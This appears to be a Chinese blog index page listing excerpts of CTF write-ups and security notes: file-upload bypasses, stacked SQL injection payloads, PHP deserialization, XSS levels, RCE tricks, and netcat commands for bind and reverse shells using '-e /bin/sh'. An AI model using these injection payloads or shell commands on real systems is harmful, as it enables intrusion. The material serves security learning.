摘要: [极客大挑战 2019]Upload 判断文件头内容是否符合要求,这里举几个常见的文件头对应关系: (1) .JPEG;.JPE;.JPG,”JPGGraphic File” (2) .gif,”GIF 89A” (3) .zip,”Zip Compressed” (4) .doc;.xls;.xl 阅读全文
posted @ 2021-10-19 14:50 学安全的小白 阅读(343) 评论(0) 推荐(0) 编辑
摘要: [强网杯 2019]随便注 第一种方法:堆叠注入 payload:1';or 1=1 查看数据库:1';show databases; 查看表名:1';show tables; 查看这两个表的列值:1';show columns from words; 1';show columns from `1 阅读全文
posted @ 2021-10-18 22:05 学安全的小白 阅读(246) 评论(0) 推荐(0) 编辑
摘要: [极客大挑战 2019]PHP 解题思路:打开题目,提示有备份=源码。于是上手7kb加CTF源码泄露字典。 发现www.zip压缩包,下载解压后发现源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $userna 阅读全文
posted @ 2021-10-17 14:19 学安全的小白 阅读(1109) 评论(0) 推荐(0) 编辑
摘要: 转载自:https://arsenetang.github.io/2021/08/31/反序列化篇之session反序列化/ Session反序列化 Session是一次浏览器和服务器的交互的会话,在ctf中,Session往往有妙用,可以实现反序列化和文件包含,接下来我们先来看看Session具体 阅读全文
posted @ 2021-10-16 16:28 学安全的小白 阅读(299) 评论(0) 推荐(0) 编辑
摘要: 转载自:https://arsenetang.github.io/2021/08/17/反序列化篇之pop链的构造(下)/ php反序列化详解参考:https://www.cnblogs.com/pursue-security/p/15291087.html php反序列化之魔法函数详解:https 阅读全文
posted @ 2021-10-16 15:48 学安全的小白 阅读(1978) 评论(0) 推荐(0) 编辑
摘要: 第一关 不使用过滤器 后台代码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert 阅读全文
posted @ 2021-10-14 20:12 学安全的小白 阅读(240) 评论(0) 推荐(0) 编辑
摘要: netcat 一句话反弹 获取shell(想反弹谁的shell就在谁的后面加-e /bin/sh或-e /bin/bash) 正向shell: 客户端主动连接服务器并获取服务器shell 客户端主动连接并得到反弹shell nc 服务端ip 8888 服务端监听连接 nc -lvp 8888 -e 阅读全文
posted @ 2021-10-14 19:23 学安全的小白 阅读(748) 评论(0) 推荐(0) 编辑
摘要: 转载自:https://arsenetang.github.io/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/ 在ctf中,有时会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否 阅读全文
posted @ 2021-10-14 14:45 学安全的小白 阅读(6390) 评论(0) 推荐(1) 编辑
摘要: 转载自:https://arsenetang.github.io/2021/07/26/RCE篇之无参数rce/ 无参数rce 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势 阅读全文
posted @ 2021-10-14 13:20 学安全的小白 阅读(5574) 评论(2) 推荐(1) 编辑
摘要: 转载自:https://arsenetang.github.io/2021/07/28/RCE篇之无字母数字rce/ 无数字字母rce 无数字字母rce,这是一个老生常谈的问题,就是不利用数字和字母构造出webshell,从而能够执行我们的命令。 核心代码 <?php highlight_file( 阅读全文
posted @ 2021-10-13 20:42 学安全的小白 阅读(8234) 评论(2) 推荐(2) 编辑